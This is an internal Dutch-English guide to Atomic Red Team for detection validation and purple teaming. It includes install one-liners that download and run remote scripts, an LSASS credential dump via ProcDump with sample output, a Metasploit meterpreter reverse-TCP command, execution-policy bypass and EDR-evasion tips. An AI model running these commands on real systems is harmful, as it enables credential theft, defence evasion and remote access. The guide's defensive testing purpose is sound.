Atomic Red Team - Detection Engineering & Purple Teaming
Bron: github.com/redcanaryco/atomic-red-team Auteur: Johan Beysen | Fox & Fish Cybersecurity
1. Overzicht
Atomic Red Team is een open-source library van kleine, gefocuste security tests ontwikkeld door Red Canary. Het framework bevat honderden "atomic tests" die specifieke adversary techniques simuleren volgens het MITRE ATT&CK framework, waarmee je kunt valideren of je security controls (EDR, SIEM, XDR) daadwerkelijk aanvallen detecteren.
Ontwikkelaar: Red Canary Type: Adversary Emulation / Detection Validation Framework Licentie: MIT Open Source Repository: https://github.com/redcanaryco/atomic-red-team MITRE ATT&CK: Volledig gemapped
2. Doel en Filosofie
2.1 Het "Atomic" Concept
Elk test is: - Atomic: Klein, discrete test van één specifieke technique - Documented: Duidelijke uitleg wat de test doet - Portable: Makkelijk te delen en reproduceren - Mapped: Gekoppeld aan MITRE ATT&CK framework
2.2 Primaire Doelen
- Detection Validation: Verifieer of security tools aanvallen detecteren
- Purple Teaming: Faciliteer samenwerking tussen Red en Blue teams
- Gap Analysis: Identificeer blinde vlekken in detection
- SOC Training: Train analisten met realistische scenarios
- Continuous Testing: Geautomatiseerde validatie van security posture
2.3 Het Verschil met Andere Tools
| Tool | Focus | Use Case |
|---|---|---|
| Atomic Red Team | Detection validation | Test of controls werken |
| Metasploit | Exploitation | Daadwerkelijk exploiten |
| Caldera | Full attack chains | Automated adversary emulation |
| Cobalt Strike | Red team operations | Volledige offensive campaigns |
3. Installatie
3.1 Windows - PowerShell Method (Aanbevolen)
# Set Execution Policy (als admin)
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
# Installeer Invoke-AtomicRedTeam module
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
# Installeer atomic tests library
Install-AtomicRedTeam -getAtomics
# Optioneel: Installeer op custom locatie
Install-AtomicRedTeam -InstallPath C:\AtomicRedTeam -getAtomics
# Verify installatie
Get-Command Invoke-AtomicTest
Standaard Locatie: C:\AtomicRedTeam\
3.2 Linux Installation
# Via Docker (aanbevolen voor Linux)
docker pull redcanary/invoke-atomicredteam:latest
# Of manual installation
git clone https://github.com/redcanaryco/atomic-red-team.git
cd atomic-red-team
# Installeer PowerShell Core op Linux
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y powershell
# Run PowerShell en installeer module
pwsh
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser
3.3 macOS Installation
# Installeer PowerShell
brew install --cask powershell
# Open PowerShell
pwsh
# Installeer Atomic Red Team
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1');
Install-AtomicRedTeam -getAtomics
4. Basis Commands
4.1 Core Commands Overzicht
| Command | Beschrijving |
|---|---|
Invoke-AtomicTest |
Voer atomic test uit |
Invoke-AtomicTest -ShowDetails |
Toon test details |
Invoke-AtomicTest -CheckPrereqs |
Check vereisten |
Invoke-AtomicTest -GetPrereqs |
Installeer vereisten |
Invoke-AtomicTest -Cleanup |
Cleanup na test |
4.2 Syntax
Invoke-AtomicTest [Technique-ID] [OPTIONS]
5. Praktische Voorbeelden
5.1 Level 1: Basis Gebruik
# Lijst alle beschikbare techniques
Invoke-AtomicTest All -ShowDetails
# Toon details van specifieke technique
Invoke-AtomicTest T1003.001 -ShowDetailsBrief
# Run single test
Invoke-AtomicTest T1003.001
# Run specifieke test number
Invoke-AtomicTest T1003.001 -TestNumbers 1
# Run multiple tests
Invoke-AtomicTest T1003.001 -TestNumbers 1,2,3
5.2 Level 2: Pre-requisites en Cleanup
# Check of prerequisites aanwezig zijn
Invoke-AtomicTest T1003.001 -CheckPrereqs
# Installeer ontbrekende prerequisites
Invoke-AtomicTest T1003.001 -GetPrereqs
# Run test met automatische cleanup
Invoke-AtomicTest T1003.001 -Cleanup
# Cleanup zonder test uit te voeren
Invoke-AtomicTest T1003.001 -Cleanup -CheckPrereqs
5.3 Level 3: Custom Parameters
# Test met custom parameters
Invoke-AtomicTest T1059.001 -TestNumbers 1 -InputArgs @{
"command" = "whoami"
}
# Meerdere parameters
Invoke-AtomicTest T1021.001 -InputArgs @{
"target" = "192.168.1.100"
"username" = "testuser"
"password" = "TestPass123!"
}
# Run met timeout
Invoke-AtomicTest T1003.001 -TimeoutSeconds 300
5.4 Level 4: Batch Testing
# Test hele ATT&CK tactic
$CredentialAccess = @("T1003.001","T1003.002","T1003.003","T1110.001")
foreach ($test in $CredentialAccess) {
Write-Host "Testing $test"
Invoke-AtomicTest $test
Start-Sleep -Seconds 5
}
# Run alle tests in een technique
Invoke-AtomicTest T1003 -TestNumbers All
# Run met logging
Invoke-AtomicTest T1003.001 | Tee-Object -FilePath C:\Logs\atomic_test.log
6. ATT&CK Techniques Coverage
6.1 Meest Gebruikte Techniques
Credential Access (TA0006)
# T1003.001 - LSASS Memory Dump
Invoke-AtomicTest T1003.001
# T1003.002 - Security Account Manager (SAM)
Invoke-AtomicTest T1003.002
# T1003.003 - NTDS.dit
Invoke-AtomicTest T1003.003
# T1110.001 - Password Guessing
Invoke-AtomicTest T1110.001
# T1555.003 - Credentials from Web Browsers
Invoke-AtomicTest T1555.003
Defense Evasion (TA0005)
# T1055 - Process Injection
Invoke-AtomicTest T1055
# T1562.001 - Disable/Modify Tools (AV/EDR)
Invoke-AtomicTest T1562.001
# T1070.001 - Clear Windows Event Logs
Invoke-AtomicTest T1070.001
# T1218.011 - Rundll32 Proxy Execution
Invoke-AtomicTest T1218.011
# T1027 - Obfuscated Files/Information
Invoke-AtomicTest T1027
Persistence (TA0003)
# T1547.001 - Registry Run Keys
Invoke-AtomicTest T1547.001
# T1053.005 - Scheduled Task
Invoke-AtomicTest T1053.005
# T1136.001 - Create Local Account
Invoke-AtomicTest T1136.001
# T1098 - Account Manipulation
Invoke-AtomicTest T1098
# T1543.003 - Windows Service
Invoke-AtomicTest T1543.003
Privilege Escalation (TA0004)
# T1134 - Access Token Manipulation
Invoke-AtomicTest T1134
# T1068 - Exploitation for Privilege Escalation
Invoke-AtomicTest T1068
# T1548.002 - Bypass UAC
Invoke-AtomicTest T1548.002
Lateral Movement (TA0008)
# T1021.001 - RDP
Invoke-AtomicTest T1021.001
# T1021.002 - SMB/Windows Admin Shares
Invoke-AtomicTest T1021.002
# T1021.003 - DCOM
Invoke-AtomicTest T1021.003
# T1021.006 - WinRM
Invoke-AtomicTest T1021.006
# T1047 - WMI
Invoke-AtomicTest T1047
Command and Control (TA0011)
# T1071.001 - Web Protocols (HTTP/HTTPS)
Invoke-AtomicTest T1071.001
# T1095 - Non-Application Layer Protocol
Invoke-AtomicTest T1095
# T1573 - Encrypted Channel
Invoke-AtomicTest T1573
Exfiltration (TA0010)
# T1020 - Automated Exfiltration
Invoke-AtomicTest T1020
# T1048.003 - Exfiltration Over Unencrypted Protocol
Invoke-AtomicTest T1048.003
# T1567.002 - Exfiltration to Cloud Storage
Invoke-AtomicTest T1567.002
7. Purple Team Workflows
7.1 Workflow 1: Detection Validation
Doel: Valideer of EDR/SIEM specifieke aanval detecteert
# STAP 1: Identificeer technique om te testen
$Technique = "T1003.001" # LSASS Memory Dump
# STAP 2: Review test details
Invoke-AtomicTest $Technique -ShowDetailsBrief
# STAP 3: Check prerequisites
Invoke-AtomicTest $Technique -CheckPrereqs
# STAP 4: Notify Blue Team
Write-Host "Starting test $Technique at $(Get-Date)"
# STAP 5: Execute test
Invoke-AtomicTest $Technique
# STAP 6: Wait voor detection
Start-Sleep -Seconds 60
# STAP 7: Verify in SIEM/EDR
# Check FortiAnalyzer, Splunk, etc.
# STAP 8: Cleanup
Invoke-AtomicTest $Technique -Cleanup
# STAP 9: Document results
"Test: $Technique | Time: $(Get-Date) | Detected: YES/NO" |
Out-File -Append C:\Logs\purple_team_results.txt
7.2 Workflow 2: Coverage Assessment
Doel: Test coverage van hele ATT&CK tactic
# Define tactic to test (Credential Access)
$CredAccessTests = @(
"T1003.001", # LSASS
"T1003.002", # SAM
"T1110.001", # Password Guessing
"T1555.003" # Browser Credentials
)
# Initialize results
$Results = @()
foreach ($Test in $CredAccessTests) {
Write-Host "`n[*] Testing $Test" -ForegroundColor Cyan
# Check if test can run
$CanRun = Invoke-AtomicTest $Test -CheckPrereqs
if ($CanRun) {
# Execute test
Invoke-AtomicTest $Test
# Wait for detection
Start-Sleep -Seconds 30
# Log result (manual verification needed)
$Results += [PSCustomObject]@{
Technique = $Test
Executed = "YES"
Timestamp = Get-Date
DetectedInSIEM = "MANUAL_CHECK"
}
# Cleanup
Invoke-AtomicTest $Test -Cleanup
} else {
Write-Host "[!] Prerequisites not met for $Test" -ForegroundColor Yellow
}
Start-Sleep -Seconds 10
}
# Export results
$Results | Export-Csv -Path C:\Reports\coverage_test_$(Get-Date -Format yyyyMMdd).csv -NoTypeInformation
7.3 Workflow 3: Continuous Validation
Doel: Geautomatiseerde dagelijkse detection testing
# Script: daily_atomic_tests.ps1
# Schedule via Task Scheduler
$TestsToRun = @(
"T1003.001", # Credential Dumping
"T1055.001", # Process Injection
"T1070.001" # Log Clearing
)
$LogFile = "C:\Logs\atomic_daily_$(Get-Date -Format yyyyMMdd).log"
foreach ($Test in $TestsToRun) {
$StartTime = Get-Date
try {
Invoke-AtomicTest $Test -ErrorAction Stop
$Status = "SUCCESS"
} catch {
$Status = "FAILED: $($_.Exception.Message)"
}
$EndTime = Get-Date
$Duration = ($EndTime - $StartTime).TotalSeconds
# Log result
"$StartTime | $Test | $Status | Duration: ${Duration}s" |
Out-File -Append $LogFile
# Cleanup
Invoke-AtomicTest $Test -Cleanup
Start-Sleep -Seconds 120 # Wait between tests
}
# Send notification
Send-MailMessage -To "soc@company.com" -Subject "Daily Atomic Tests Complete" -Body "See log: $LogFile"
8. Detection Engineering
8.1 Scenario 1: Testing EDR Bypass
Doel: Verificeer of EDR evasion techniques gedetecteerd worden
# Test 1: Process Hollowing
Invoke-AtomicTest T1055.012
# Check EDR logs
# Expected: Alert for process hollowing
# Test 2: AMSI Bypass
Invoke-AtomicTest T1562.001 -TestNumbers 1
# Check EDR logs
# Expected: AMSI tampering alert
# Test 3: Obfuscated PowerShell
Invoke-AtomicTest T1059.001 -TestNumbers 5
# Check EDR logs
# Expected: Suspicious PowerShell execution
8.2 Scenario 2: Building Detection Rules
Proces:
-
Run Atomic Test
Invoke-AtomicTest T1003.001 -TestNumbers 1 -
Analyze Telemetry
- Check Sysmon logs
- Review EDR telemetry
-
Examine network traffic
-
Build Detection Rule
# Example Sigma Rule title: LSASS Memory Dump via ProcDump status: experimental logsource: category: process_creation product: windows detection: selection: CommandLine|contains: - 'procdump' - 'lsass' condition: selection level: high -
Validate Rule
# Re-run test Invoke-AtomicTest T1003.001 -TestNumbers 1 # Verify rule triggers # Tune false positives # Repeat
8.3 Scenario 3: Testing Sigma Rules
# Map Sigma rule to Atomic test
$SigmaRule = "proc_creation_win_lsass_dump.yml"
$AtomicTest = "T1003.001"
# Run corresponding atomic test
Invoke-AtomicTest $AtomicTest
# Check if Sigma rule triggered in SIEM
# Document coverage
9. Integration met Security Stack
9.1 FortiEDR / FortiClient Integration
Test FortiEDR Detection:
# Test 1: Credential Access
Write-Host "[*] Testing FortiEDR Credential Dumping Detection"
Invoke-AtomicTest T1003.001
# Expected FortiEDR behavior:
# - Block LSASS access
# - Generate alert
# - Quarantine process
# Test 2: Ransomware Simulation
Invoke-AtomicTest T1486 # Data Encrypted for Impact
# Expected FortiEDR behavior:
# - Detect mass file encryption
# - Block ransomware process
# - Generate critical alert
# Test 3: Process Injection
Invoke-AtomicTest T1055.001
# Expected FortiEDR behavior:
# - Detect injection attempt
# - Block malicious process
# - Alert on technique
9.2 FortiAnalyzer / SIEM Integration
# Generate test traffic met timestamps
$TestStart = Get-Date
Invoke-AtomicTest T1003.001
Start-Sleep -Seconds 30
Invoke-AtomicTest T1059.001
Start-Sleep -Seconds 30
Invoke-AtomicTest T1055.001
Start-Sleep -Seconds 30
$TestEnd = Get-Date
# Build FortiAnalyzer query
Write-Host @"
FortiAnalyzer Query:
Time Range: $TestStart to $TestEnd
Log Type: FortiClient Telemetry
Search: LSASS OR PowerShell OR Injection
"@
# Verify logs in FortiAnalyzer dashboard
# Build correlation rules
9.3 Nessus Integration
# Run atomic tests
Invoke-AtomicTest T1068 # Privilege Escalation
# Follow up met Nessus scan
Start-Process "C:\Program Files\Tenable\Nessus\nessuscli.exe" -ArgumentList "scan new --name 'Post-Atomic-Validation'"
# Compare: What did Atomic exploit vs what Nessus detected
9.4 Metasploit Comparison
# Atomic Test (Detection focus)
Invoke-AtomicTest T1055.001
# vs.
# Metasploit (Exploitation focus)
msfconsole -x "use exploit/windows/local/ms16_075_reflection; set PAYLOAD windows/meterpreter/reverse_tcp; exploit"
# Use cases:
# - Atomic: Does my EDR detect process injection?
# - Metasploit: Can I actually exploit this vulnerability?
10. Lab Setup & Testing Environments
10.1 Proxmox Lab Configuration
VM Setup voor Atomic Testing:
VM1: Windows 10 (Target)
- FortiClient EDR installed
- Sysmon installed
- Attack simulation target
VM2: Windows Server 2019 (Domain Controller)
- Active Directory
- Test domain: lab.local
VM3: Kali Linux (Attack Platform)
- Invoke-AtomicRedTeam (via PowerShell Core)
- C2 servers for validation
VM4: Security Stack
- FortiAnalyzer
- Splunk / ELK
- Log aggregation
Network Segmentation:
VLAN 10: Management (192.168.10.0/24)
VLAN 20: Target Network (192.168.20.0/24)
VLAN 30: Security Tools (192.168.30.0/24)
FortiGate: Tussen alle VLANs
- IPS enabled
- Application Control
- Full logging naar FortiAnalyzer
10.2 Snapshot Strategy
Voor testing:
# 1. Maak clean snapshot
# In Proxmox: "Snapshot" > "Take Snapshot" > "clean_baseline"
# 2. Run atomic tests
Invoke-AtomicTest T1003.001
# 3. Analyze results
# 4. Rollback naar clean state
# In Proxmox: "Snapshot" > "Rollback" > "clean_baseline"
# 5. Repeat voor next test
Automation:
# Bash script voor automated snapshot/test/rollback
#!/bin/bash
VM_ID="100"
SNAPSHOT_NAME="clean_baseline"
# Take snapshot
qm snapshot $VM_ID $SNAPSHOT_NAME
# Run test (via API of SSH)
ssh administrator@192.168.20.10 "powershell.exe -Command 'Invoke-AtomicTest T1003.001'"
# Wait for analysis
sleep 300
# Rollback
qm rollback $VM_ID $SNAPSHOT_NAME
# Next test
11. Advanced Use Cases
11.1 Custom Atomic Tests
Create your own atomic test:
# File: T1003.001-custom.yaml
attack_technique: T1003.001
display_name: Custom LSASS Dump via Custom Tool
atomic_tests:
- name: Custom LSASS Memory Dump
auto_generated_guid: 12345678-1234-1234-1234-123456789abc
description: |
Dump LSASS memory using custom tool for testing
supported_platforms:
- windows
input_arguments:
dump_path:
description: Path to save dump
type: Path
default: C:\Temp\lsass_custom.dmp
executor:
command: |
C:\Tools\CustomDumper.exe -o #{dump_path}
name: powershell
elevation_required: true
cleanup_command: |
Remove-Item #{dump_path} -ErrorAction Ignore
Run custom test:
Invoke-AtomicTest -PathToAtomicsFolder C:\CustomAtomics\ -AtomicTechnique T1003.001-custom
11.2 Chaining Attacks (Kill Chain Testing)
# Simulate complete attack chain
# Phase 1: Initial Access (Phishing Simulation)
Invoke-AtomicTest T1566.001
Start-Sleep -Seconds 60
# Phase 2: Execution
Invoke-AtomicTest T1059.001 # PowerShell
Start-Sleep -Seconds 60
# Phase 3: Persistence
Invoke-AtomicTest T1547.001 # Registry Run Key
Start-Sleep -Seconds 60
# Phase 4: Privilege Escalation
Invoke-AtomicTest T1134 # Token Manipulation
Start-Sleep -Seconds 60
# Phase 5: Credential Access
Invoke-AtomicTest T1003.001 # LSASS Dump
Start-Sleep -Seconds 60
# Phase 6: Lateral Movement
Invoke-AtomicTest T1021.002 # SMB
Start-Sleep -Seconds 60
# Phase 7: Exfiltration
Invoke-AtomicTest T1048.003 # Data exfil
# Analyze: Which phases were detected?
# Document: Detection gaps
11.3 CI/CD Integration
Automated testing in pipeline:
# .gitlab-ci.yml example
stages:
- atomic-testing
- validation
atomic_tests:
stage: atomic-testing
script:
- Import-Module invoke-atomicredteam
- $Tests = @("T1003.001","T1055.001","T1059.001")
- foreach ($Test in $Tests) { Invoke-AtomicTest $Test }
artifacts:
paths:
- test-results/
only:
- schedules
validation:
stage: validation
script:
- python3 validate_detections.py
dependencies:
- atomic_tests
12. Reporting & Documentation
12.1 Generate Coverage Report
# Script: generate_coverage_report.ps1
# Get all available atomic tests
$AllTests = Invoke-AtomicTest All -ShowDetails
# Tests executed today
$ExecutedTests = Get-Content C:\Logs\executed_tests_$(Get-Date -Format yyyyMMdd).txt
# Generate report
$Report = @{
"Total_Available_Tests" = $AllTests.Count
"Tests_Executed" = $ExecutedTests.Count
"Coverage_Percentage" = ($ExecutedTests.Count / $AllTests.Count) * 100
"Tactics_Covered" = ($ExecutedTests | Select-String -Pattern "TA\d{4}" | Group-Object).Count
}
# Export
$Report | ConvertTo-Json | Out-File C:\Reports\coverage_report_$(Get-Date -Format yyyyMMdd).json
# Visualize in PowerBI / Grafana
12.2 Detection Matrix
# Create ATT&CK Navigator layer
$DetectionMatrix = @()
$AllTests = @("T1003.001","T1055.001","T1059.001","T1070.001")
foreach ($Test in $AllTests) {
$DetectionMatrix += [PSCustomObject]@{
TechniqueID = $Test
Tested = "YES"
Detected = "MANUAL_CHECK" # Update after SIEM verification
DetectionSource = "FortiEDR"
Date = Get-Date -Format "yyyy-MM-dd"
}
}
# Export voor ATT&CK Navigator
$DetectionMatrix | ConvertTo-Json | Out-File C:\Reports\detection_matrix.json
Purple Team Report Template
# Purple Team Exercise Report
**Date:** 2025-12-01
**Duration:** 4 hours
**Participants:** Red Team (Johan), Blue Team (SOC)
## Scope
- **Tactics Tested:** Credential Access, Defense Evasion, Persistence
- **Techniques:** T1003.001, T1055.001, T1547.001
- **Environment:** Production Lab (isolated)
## Test Results
### T1003.001 - LSASS Memory Dump
- **Executed:** YES
- **Detected by FortiEDR:** YES (Blocked)
- **Detected by SIEM:** YES (Alert generated)
- **Response Time:** 15 seconds
- **Status:** PASS
### T1055.001 - Process Injection
- **Executed:** YES
- **Detected by FortiEDR:** PARTIAL (Logged, not blocked)
- **Detected by SIEM:** NO
- **Response Time:** N/A
- **Status:** NEEDS TUNING
## Recommendations
1. Tune FortiEDR to block T1055.001
2. Create SIEM correlation rule for process injection
3. Add T1055 to SOC playbook
## Next Steps
- Schedule follow-up test in 2 weeks
- Implement recommendations
- Test Lateral Movement tactics
13. Troubleshooting
13.1 Common Issues
Issue 1: "Execution Policy" Errors
# Error: cannot be loaded because running scripts is disabled
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
# Or bypass voor single test
powershell.exe -ExecutionPolicy Bypass -File test.ps1
Issue 2: Prerequisites Missing
# Check what's missing
Invoke-AtomicTest T1003.001 -CheckPrereqs
# Auto-install prerequisites
Invoke-AtomicTest T1003.001 -GetPrereqs
# Manual install example
choco install procdump -y
Issue 3: Tests Fail Silently
# Run with verbose output
Invoke-AtomicTest T1003.001 -Verbose
# Check transcript
Start-Transcript -Path C:\Logs\atomic_debug.log
Invoke-AtomicTest T1003.001
Stop-Transcript
Issue 4: Cleanup Failures
# Manual cleanup
Invoke-AtomicTest T1003.001 -Cleanup
# Force cleanup
Stop-Process -Name "procdump" -Force -ErrorAction SilentlyContinue
Remove-Item C:\Temp\lsass.dmp -Force -ErrorAction SilentlyContinue
# Reset to baseline
# Use VM snapshot rollback
Issue 5: EDR Blocks Execution
# Temporarily disable EDR (in test environment only!)
# Method depends on EDR solution
# For testing purposes, whitelist Atomic directory
# In FortiClient: Settings > Exceptions > Add: C:\AtomicRedTeam\
# Alternative: Run from non-standard location
Copy-Item C:\AtomicRedTeam C:\CustomPath
cd C:\CustomPath
Invoke-AtomicTest T1003.001
14. Best Practices
Do's
- Always coordinate met Blue Team
- Schedule tests vooraf
- Communicate tijdens execution
-
Debrief na afloop
-
Use isolated environment eerst
- Test in lab voor production
- Verify impact van tests
-
Document side effects
-
Document everything
- Test parameters
- Results
- Detection gaps
-
Recommendations
-
Start small
- Begin met basic tests
- Build up complexity
-
Learn your environment
-
Cleanup religiously
- Run cleanup commands
- Verify artifacts removed
- Check for persistence
Don'ts
- Never run in production zonder approval
- Some tests cause system instability
- Can trigger incident response
-
May violate policies
-
Don't chain tests zonder pause
- Give SOC time to analyze
- Prevent log flooding
-
Allow for detection validation
-
Don't ignore prerequisites
- Tests may fail unexpectedly
- Can cause partial execution
-
May leave artifacts
-
Don't test tijdens business hours (initial runs)
- Test impact unknown
- Could cause alerts
-
May disrupt operations
-
Don't forget legal authorization
- Get written approval
- Document scope
- Follow rules of engagement
15. Detection Coverage Tracking
15.1 Create Detection Dashboard
# Script: update_detection_coverage.ps1
# Define all techniques in your scope
$InScopeTechniques = @(
"T1003.001", "T1003.002", "T1003.003",
"T1055.001", "T1055.002",
"T1059.001", "T1059.003",
"T1070.001",
"T1547.001",
"T1053.005"
)
# Check current coverage
$Coverage = @()
foreach ($Technique in $InScopeTechniques) {
# Check if test exists
$TestExists = Test-Path "C:\AtomicRedTeam\atomics\$Technique"
# Check if detected (read from previous test logs)
$DetectionLog = "C:\Logs\detections.csv"
$IsDetected = Import-Csv $DetectionLog | Where-Object { $_.Technique -eq $Technique }
$Coverage += [PSCustomObject]@{
Technique = $Technique
TestAvailable = $TestExists
LastTested = $IsDetected.Date
DetectedByEDR = $IsDetected.EDR_Detected
DetectedBySIEM = $IsDetected.SIEM_Detected
CoverageScore = if($IsDetected.EDR_Detected -and $IsDetected.SIEM_Detected) { 100 }
elseif($IsDetected.EDR_Detected -or $IsDetected.SIEM_Detected) { 50 }
else { 0 }
}
}
# Calculate overall coverage
$OverallCoverage = ($Coverage | Where-Object { $_.CoverageScore -eq 100 }).Count / $InScopeTechniques.Count * 100
Write-Host "Overall Detection Coverage: $OverallCoverage%"
# Export voor dashboard
$Coverage | Export-Csv C:\Reports\coverage_$(Get-Date -Format yyyyMMdd).csv -NoTypeInformation
15.2 Integration met ATT&CK Navigator
- Export results naar Navigator format:
$NavigatorLayer = @{
"name" = "Atomic Red Team Coverage"
"versions" = @{
"attack" = "13"
"navigator" = "4.8"
"layer" = "4.4"
}
"domain" = "enterprise-attack"
"description" = "Detection coverage from Atomic Red Team testing"
"techniques" = @()
}
foreach ($Test in $Coverage) {
$NavigatorLayer.techniques += @{
"techniqueID" = $Test.Technique
"score" = $Test.CoverageScore
"color" = if($Test.CoverageScore -eq 100) { "#00ff00" }
elseif($Test.CoverageScore -eq 50) { "#ffff00" }
else { "#ff0000" }
"comment" = "Last tested: $($Test.LastTested)"
}
}
$NavigatorLayer | ConvertTo-Json -Depth 10 | Out-File C:\Reports\navigator_layer.json
- Import in ATT&CK Navigator:
- Go to https://mitre-attack.github.io/attack-navigator/
- Upload
navigator_layer.json - Visualize coverage
16. Cheat Sheet
16.1 Quick Commands
# Installation
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam -getAtomics
# List all tests
Invoke-AtomicTest All -ShowDetails
# Show specific technique
Invoke-AtomicTest T1003.001 -ShowDetailsBrief
# Check prerequisites
Invoke-AtomicTest T1003.001 -CheckPrereqs
# Install prerequisites
Invoke-AtomicTest T1003.001 -GetPrereqs
# Run test
Invoke-AtomicTest T1003.001
# Run specific test number
Invoke-AtomicTest T1003.001 -TestNumbers 1
# Run with cleanup
Invoke-AtomicTest T1003.001 -Cleanup
# Cleanup only
Invoke-AtomicTest T1003.001 -Cleanup -TestNumbers 1
# Custom parameters
Invoke-AtomicTest T1059.001 -InputArgs @{"command"="whoami"}
# Verbose output
Invoke-AtomicTest T1003.001 -Verbose
# Update atomics
Update-AtomicRedTeam
16.2 Top 10 Tests voor SOC Validation
# 1. Credential Dumping
Invoke-AtomicTest T1003.001
# 2. PowerShell Execution
Invoke-AtomicTest T1059.001
# 3. Process Injection
Invoke-AtomicTest T1055.001
# 4. Scheduled Task Persistence
Invoke-AtomicTest T1053.005
# 5. Registry Run Key
Invoke-AtomicTest T1547.001
# 6. Event Log Clearing
Invoke-AtomicTest T1070.001
# 7. Lateral Movement (SMB)
Invoke-AtomicTest T1021.002
# 8. Discovery (Network)
Invoke-AtomicTest T1016
# 9. Data Exfiltration
Invoke-AtomicTest T1048.003
# 10. Ransomware Simulation
Invoke-AtomicTest T1486
17. Resources
17.1 Official Resources
- GitHub: https://github.com/redcanaryco/atomic-red-team
- Documentation: https://atomicredteam.io/
- Invoke-AtomicRedTeam: https://github.com/redcanaryco/invoke-atomicredteam
17.2 Learning Materials
- Red Canary Blog: https://redcanary.com/blog/
- MITRE ATT&CK: https://attack.mitre.org/
- ATT&CK Navigator: https://mitre-attack.github.io/attack-navigator/
17.3 Community
- Slack: Red Canary Community
- Twitter: @redcanary, @attackevals
- LinkedIn: Red Canary Group
17.4 Related Tools
- Atomic Threat Coverage: Detection rule repository
- Sigma: Generic signature format
- Caldera: Automated adversary emulation
- VECTR: Purple team management platform
17.5 Belgian/EU Specific
- CCB (Centre for Cybersecurity Belgium): Threat intelligence
- NIST Cybersecurity Framework: Detection guidelines
- IEC 62443: Industrial security (voor OT testing)
18. Appendix: Sample Test Output
Example: T1003.001 Execution
PS C:\> Invoke-AtomicTest T1003.001
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
[********BEGIN TEST*******]
Executing test: T1003.001-1 Dump LSASS.exe Memory using ProcDump
Elevation required: True
Command:
C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass_dump.dmp
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[12:34:56] Dump 1 initiated: C:\Temp\lsass_dump.dmp
[12:34:57] Dump 1 writing: Estimated dump file size is 52 MB.
[12:34:58] Dump 1 complete: 52 MB written in 2.0 seconds
[12:34:58] Dump count reached.
Done. [*******END TEST*******]
Kritieke Herinneringen
- Altijd toestemming krijgen voor testing
- Start in geïsoleerde omgeving
- Coordinate met Blue Team
- Document alles
- Cleanup na elke test
- Respect production systems
Voor Stage Project
Perfect voor het valideren van FortiEDR, FortiAnalyzer, en je firewall evaluatie. Test welke vendor welke techniques detecteert, en bouw je Purple Team capabilities op!
Fox & Fish Cybersecurity | Intern gebruik